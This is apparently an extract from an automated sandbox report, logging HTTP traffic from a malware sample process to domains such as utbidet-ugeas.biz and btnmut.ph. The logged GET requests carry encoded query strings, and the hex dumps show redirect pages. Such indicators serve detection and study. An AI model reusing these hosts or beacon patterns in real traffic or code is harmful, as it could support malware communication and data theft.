                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            67192.168.2.361414172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.587378979 CEST201OUTGET /d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:10.098891973 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            68192.168.2.361416172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.167176008 CEST169OUTGET /d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.658231974 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            69192.168.2.361417172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:11.664191961 CEST201OUTGET /d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:12.355822086 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740F6E
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            70192.168.2.361419172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.398159027 CEST169OUTGET /d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.877209902 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            71192.168.2.361420172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:14.896779060 CEST201OUTGET /d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.386868000 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:15 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72D62
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            72192.168.2.361422172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:15.538516998 CEST169OUTGET /d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.042725086 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:15 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            73192.168.2.361423172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.053064108 CEST201OUTGET /d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.535092115 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:16 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA615
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            74192.168.2.361425172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:16.819772959 CEST169OUTGET /d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.327594995 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            75192.168.2.361426172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.333831072 CEST201OUTGET /d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.816351891 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD5615DA
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            76192.168.2.361428172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:17.991661072 CEST169OUTGET /d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.492641926 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            77192.168.2.361429172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:18.499243021 CEST201OUTGET /d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:19.003392935 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            78192.168.2.36143045.79.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:22.960108995 CEST115OUTGET / HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: btnmut.ph
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:23.449069023 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sat, 07 Sep 2024 13:35:23 GMT
                                                                                                                                                                                                            server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.5.38
                                                                                                                                                                                                            x-powered-by: PHP/5.5.38
                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            content-length: 1906
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 76 61 72 20 66 6f 72 77 61 72 64 69 6e 67 55 72 6c 20 3d 20 22 2f 70 61 67 65 2f 62 6f 75 6e 63 79 2e 70 68 70 3f 26 62 70 61 65 3d 47 62 68 47 64 69 63 47 6f 6b 78 37 6a 32 25 32 46 74 57 6c 70 6c 63 4d 4c 48 4c 6a 64 39 46 4a 76 6d 47 57 45 71 64 68 6b 71 4a 68 33 58 4a 65 30 44 42 4c 78 71 61 55 4d 66 68 78 53 37 35 37 69 39 25 32 46 73 64 75 58 62 39 51 58 54 76 59 48 68 47 75 25 32 46 48 57 6c 62 69 71 4c 46 4a 38 32 73 4e 43 7a 74 69 53 41 71 75 78 45 57 69 35 46 47 52 42 53 4e 48 77 63 53 47 4b 70 5a 42 39 56 72 59 35 7a 65 6c 44 6b 44 46 5a 64 38 7a 54 4c 78 62 45 59 52 45 6c 57 25 32 46 4e 4c 6b 51 4e 72 43 4a 6a 39 4e 63 7a 76 58 69 7a 71 77 59 78 55 70 4c 48 70 48 58 4d 47 45 6a 45 79 43 78 37 67 48 68 69 4c 4b 6a 63 63 34 74 4d 78 52 31 71 75 5a 58 42 6b 6e 65 41 59 74 53 6b 32 62 42 42 64 69 44 49 53 49 35 31 4e 32 58 7a 4b 6a 54 47 4e 64 79 72 54 61 5a 67 52 51 34 75 64 47 4b 76 50 4d 78 54 69 6c 47 [TRUNCATED]
